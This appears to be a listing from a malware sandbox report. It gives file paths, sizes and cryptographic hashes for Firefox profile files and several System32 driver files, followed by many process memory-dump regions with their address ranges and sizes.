C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\datareporting\glean\pending_pings\e930a17b-01c4-412a-9cc2-4d4c2b85c368

Filesize
235B

MD5
06ba3394dcee852e9e956a39fff7cc3d

SHA1
e4d47f2567a87d62bcb02fb1fc91538845daea03

SHA256
21f90de15e892905e2fab9727f9d6a6cb580fcfad28219de5b7a76bbd977a4a9

SHA512
0bfa5eafc481975648bdf6c64c26f4994311b7f116e228de6c3b72b6106a5b831ab50f99013b2662865ead5ab01062eca0d3c9732e978ffa9e3fdb2b1b35b429

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\prefs.js

Filesize
6KB

MD5
78ee7b770ad095fff2ca87fd816c16dd

SHA1
a7ca4c8aaf19b6c6ecdae5ee8ee2de622dd92b11

SHA256
c613627abc076d8879e88d20f59b6621eff0b9e0ec23af614bb084471c367735

SHA512
45db36db6fd1dc0abf11d1ed21c17e46e9bacfee0f5241853a0e5005ea53f47833024f7d4ab88373a624ea00e9ceaea0a1f75b5242b87eae07fd774c2d1adfd8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hvtnam9x.default-release\prefs.js

Filesize
6KB

MD5
9429aba7f8ed9a0a0a56d56a34a70b00

SHA1
fea1ddefc1b104ec2fed77e7767c7778741abbc3

SHA256
d022e3aef83e4dbb5d5ce5343ccaba885ab8145466226531a9632b0aa0d1bf3f

SHA512
21efdc94e5b9476266e32a025173a9cfa78565d01a5aa61e7de302cdfc61a29ceb381c7bb8da4bd492e5a6cfd34a7dcb53d09cbd49a5240a37d978fecd476eee

Download Submit
C:\Windows\System32\drivers\b30be13d.sys

Filesize
368KB

MD5
990442d764ff1262c0b7be1e3088b6d3

SHA1
0b161374074ef2acc101ed23204da00a0acaa86e

SHA256
6c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4

SHA512
af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4

Download Submit
C:\Windows\System32\drivers\klupd_b30be13da_klark.sys

Filesize
355KB

MD5
9cfe1ced0752035a26677843c0cbb4e3

SHA1
e8833ac499b41beb6763a684ba60333cdf955918

SHA256
3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634

SHA512
29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

Download Submit
C:\Windows\System32\drivers\klupd_b30be13da_klbg.sys

Filesize
199KB

MD5
424b93cb92e15e3f41e3dd01a6a8e9cc

SHA1
2897ab04f69a92218bfac78f085456f98a18bdd3

SHA256
ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

SHA512
15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

Download Submit
C:\Windows\System32\drivers\klupd_b30be13da_mark.sys

Filesize
260KB

MD5
66522d67917b7994ddfb5647f1c3472e

SHA1
f341b9b28ca7ac21740d4a7d20e4477dba451139

SHA256
5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

SHA512
921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

Download Submit
memory/208-275-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/208-165-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/208-111-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/208-113-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/1172-773-0x000002C8A8860000-0x000002C8A8882000-memory.dmp

Filesize
136KB

Download
memory/1172-823-0x000002C8A88E0000-0x000002C8A88EA000-memory.dmp

Filesize
40KB

Download
memory/1172-830-0x000002C8C31E0000-0x000002C8C31EA000-memory.dmp

Filesize
40KB

Download
memory/1172-826-0x000002C8A88F0000-0x000002C8A88F8000-memory.dmp

Filesize
32KB

Download
memory/1172-810-0x000002C8C3080000-0x000002C8C309C000-memory.dmp

Filesize
112KB

Download
memory/1276-86-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/1276-131-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/1276-90-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/1276-194-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/1276-151-0x0000000010000000-0x000000001001C000-memory.dmp

Filesize
112KB

Download
memory/1624-763-0x000002361B270000-0x000002361B2E1000-memory.dmp

Filesize
452KB

Download
memory/1624-754-0x0000000000720000-0x0000000000722000-memory.dmp

Filesize
8KB

Download
memory/1624-767-0x000002361B270000-0x000002361B2E1000-memory.dmp

Filesize
452KB

Download
memory/1624-766-0x000002361B270000-0x000002361B2E1000-memory.dmp

Filesize
452KB

Download
memory/1624-756-0x000002361B270000-0x000002361B2E1000-memory.dmp

Filesize
452KB

Download
memory/1784-22-0x0000000007350000-0x00000000073E6000-memory.dmp

Filesize
600KB

Download
memory/1784-4-0x0000000004F20000-0x0000000004F42000-memory.dmp

Filesize
136KB

Download
memory/1784-3-0x0000000004FA0000-0x00000000055C8000-memory.dmp

Filesize
6.2MB

Download
memory/1784-24-0x0000000008120000-0x00000000086C4000-memory.dmp

Filesize
5.6MB

Download
memory/1784-23-0x00000000072E0000-0x0000000007302000-memory.dmp

Filesize
136KB

Download
memory/1784-19-0x00000000074F0000-0x0000000007B6A000-memory.dmp

Filesize
6.5MB

Download
memory/1784-20-0x00000000062C0000-0x00000000062DA000-memory.dmp

Filesize
104KB

Download
memory/1784-18-0x0000000005E70000-0x0000000005EBC000-memory.dmp

Filesize
304KB

Download
memory/1784-17-0x0000000005DC0000-0x0000000005DDE000-memory.dmp

Filesize
120KB

Download
memory/1784-16-0x00000000058E0000-0x0000000005C34000-memory.dmp

Filesize
3.3MB

Download
memory/1784-2-0x0000000002810000-0x0000000002846000-memory.dmp

Filesize
216KB

Download
memory/1784-6-0x0000000005770000-0x00000000057D6000-memory.dmp

Filesize
408KB

Download
memory/1784-5-0x0000000005700000-0x0000000005766000-memory.dmp

Filesize
408KB

Download
memory/2444-31160-0x0000000000CB0000-0x000000000115E000-memory.dmp

Filesize
4.7MB

Download
memory/2444-31672-0x0000000000CB0000-0x000000000115E000-memory.dmp

Filesize
4.7MB

Download
memory/3340-277-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3340-280-0x0000000002AF0000-0x0000000002EF0000-memory.dmp

Filesize
4.0MB

Download
memory/3340-281-0x0000000002AF0000-0x0000000002EF0000-memory.dmp

Filesize
4.0MB

Download
memory/3340-282-0x00007FF829190000-0x00007FF829385000-memory.dmp

Filesize
2.0MB

Download
memory/3340-284-0x00000000758D0000-0x0000000075AE5000-memory.dmp

Filesize
2.1MB

Download
memory/3340-276-0x0000000000400000-0x000000000047F000-memory.dmp

Filesize
508KB

Download
memory/3348-996-0x0000000000400000-0x00000000008A2000-memory.dmp

Filesize
4.6MB

Download
memory/3348-29668-0x0000000000400000-0x00000000008A2000-memory.dmp

Filesize
4.6MB

Download
memory/3620-163-0x0000000000AE0000-0x0000000000F92000-memory.dmp

Filesize
4.7MB

Download
memory/3620-161-0x0000000000AE0000-0x0000000000F92000-memory.dmp

Filesize
4.7MB

Download
memory/3844-287-0x0000000000B90000-0x0000000000F90000-memory.dmp

Filesize
4.0MB

Download
memory/3844-290-0x00000000758D0000-0x0000000075AE5000-memory.dmp

Filesize
2.1MB

Download
memory/3844-288-0x00007FF829190000-0x00007FF829385000-memory.dmp

Filesize
2.0MB

Download
memory/3844-285-0x00000000006F0000-0x00000000006FA000-memory.dmp

Filesize
40KB

Download
memory/4184-83-0x0000000000400000-0x0000000000E11000-memory.dmp

Filesize
10.1MB

Download
memory/4184-89-0x0000000000400000-0x0000000000E11000-memory.dmp

Filesize
10.1MB

Download
memory/4304-109-0x0000000000400000-0x0000000000CDA000-memory.dmp

Filesize
8.9MB

Download
memory/4304-114-0x0000000000400000-0x0000000000CDA000-memory.dmp

Filesize
8.9MB

Download
memory/4692-236-0x0000000005630000-0x000000000564A000-memory.dmp

Filesize
104KB

Download
memory/4692-195-0x0000000006CD0000-0x0000000006D1C000-memory.dmp

Filesize
304KB

Download
memory/4692-255-0x000000000D8A0000-0x000000000D8EE000-memory.dmp

Filesize
312KB

Download
memory/4692-252-0x000000000D260000-0x000000000D2B0000-memory.dmp

Filesize
320KB

Download
memory/4692-254-0x000000000D600000-0x000000000D7C2000-memory.dmp

Filesize
1.8MB

Download
memory/4692-253-0x000000000D370000-0x000000000D422000-memory.dmp

Filesize
712KB

Download
memory/4692-237-0x0000000008B50000-0x0000000008B5A000-memory.dmp

Filesize
40KB

Download
memory/4692-235-0x00000000088C0000-0x0000000008A14000-memory.dmp

Filesize
1.3MB

Download
memory/4692-201-0x0000000007D80000-0x0000000007E78000-memory.dmp

Filesize
992KB

Download
memory/4692-179-0x00000000061C0000-0x0000000006514000-memory.dmp

Filesize
3.3MB

Download
memory/4692-200-0x0000000003150000-0x0000000003158000-memory.dmp

Filesize
32KB

Download
memory/4692-199-0x0000000007B30000-0x0000000007BC2000-memory.dmp

Filesize
584KB

Download
memory/4848-228-0x00000000072F0000-0x0000000007301000-memory.dmp

Filesize
68KB

Download
memory/4848-232-0x0000000007430000-0x000000000744A000-memory.dmp

Filesize
104KB

Download
memory/4848-233-0x0000000007420000-0x0000000007428000-memory.dmp

Filesize
32KB

Download
memory/4848-231-0x0000000007330000-0x0000000007344000-memory.dmp

Filesize
80KB

Download
memory/4848-230-0x0000000007320000-0x000000000732E000-memory.dmp

Filesize
56KB

Download
memory/4848-227-0x0000000007180000-0x000000000718A000-memory.dmp

Filesize
40KB

Download
memory/4848-214-0x0000000006380000-0x00000000063B2000-memory.dmp

Filesize
200KB

Download
memory/4848-215-0x0000000070260000-0x00000000702AC000-memory.dmp

Filesize
304KB

Download
memory/4848-226-0x0000000006F80000-0x0000000007023000-memory.dmp

Filesize
652KB

Download
memory/4848-225-0x0000000006360000-0x000000000637E000-memory.dmp

Filesize
120KB

Download
memory/5344-129-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/5344-130-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/5596-747-0x0000000000400000-0x000000000068D000-memory.dmp

Filesize
2.6MB

Download
memory/5836-1016-0x0000000000880000-0x0000000000A08000-memory.dmp

Filesize
1.5MB

Download
memory/5836-1013-0x0000000000880000-0x0000000000A08000-memory.dmp

Filesize
1.5MB

Download
memory/5836-1012-0x0000000000880000-0x0000000000A08000-memory.dmp

Filesize
1.5MB

Download
memory/5836-1011-0x0000000000880000-0x0000000000A08000-memory.dmp

Filesize
1.5MB

Download
memory/5836-1009-0x0000000000880000-0x0000000000A08000-memory.dmp

Filesize
1.5MB

Download
memory/5836-1007-0x0000000140000000-0x0000000140447000-memory.dmp

Filesize
4.3MB

Download
memory/5836-1010-0x0000000000880000-0x0000000000A08000-memory.dmp

Filesize
1.5MB

Download
memory/5836-1015-0x0000000000880000-0x0000000000A08000-memory.dmp

Filesize
1.5MB

Download
memory/5836-1014-0x0000000000880000-0x0000000000A08000-memory.dmp

Filesize
1.5MB

Download
memory/5896-34-0x0000000000EA0000-0x0000000001352000-memory.dmp

Filesize
4.7MB

Download
memory/5896-47-0x0000000000EA0000-0x0000000001352000-memory.dmp

Filesize
4.7MB

Download
memory/6028-212-0x0000000000AE0000-0x0000000000F92000-memory.dmp

Filesize
4.7MB

Download
memory/6028-48-0x0000000000AE0000-0x0000000000F92000-memory.dmp

Filesize
4.7MB

Download
memory/6028-293-0x0000000000AE0000-0x0000000000F92000-memory.dmp

Filesize
4.7MB

Download
memory/6028-65-0x0000000000AE0000-0x0000000000F92000-memory.dmp

Filesize
4.7MB

Download
memory/6028-64-0x0000000000AE0000-0x0000000000F92000-memory.dmp

Filesize
4.7MB

Download
memory/6028-132-0x0000000000AE0000-0x0000000000F92000-memory.dmp

Filesize
4.7MB

Download
memory/6028-769-0x0000000000AE0000-0x0000000000F92000-memory.dmp

Filesize
4.7MB

Download
memory/6028-91-0x0000000000AE0000-0x0000000000F92000-memory.dmp

Filesize
4.7MB

Download
memory/6624-29687-0x0000000000640000-0x0000000000AF0000-memory.dmp

Filesize
4.7MB

Download
memory/6624-29690-0x0000000000640000-0x0000000000AF0000-memory.dmp

Filesize
4.7MB

Download
memory/6792-29692-0x0000000000AE0000-0x0000000000F92000-memory.dmp

Filesize
4.7MB

Download
memory/7268-29720-0x0000000000F10000-0x000000000121F000-memory.dmp

Filesize
3.1MB

Download
memory/7268-29723-0x0000000000F10000-0x000000000121F000-memory.dmp

Filesize
3.1MB

Download
memory/7528-30152-0x00000000008D0000-0x0000000000D2E000-memory.dmp

Filesize
4.4MB

Download
memory/7528-30147-0x00000000008D0000-0x0000000000D2E000-memory.dmp

Filesize
4.4MB

Download
memory/7528-32109-0x00000000008D0000-0x0000000000D2E000-memory.dmp

Filesize
4.4MB

Download
memory/7528-32461-0x00000000008D0000-0x0000000000D2E000-memory.dmp

Filesize
4.4MB

Download
memory/7528-30153-0x00000000008D0000-0x0000000000D2E000-memory.dmp

Filesize
4.4MB

Download
memory/9064-29846-0x0000000000EA0000-0x0000000001536000-memory.dmp

Filesize
6.6MB

Download
memory/9064-29855-0x0000000000EA0000-0x0000000001536000-memory.dmp

Filesize
6.6MB

Download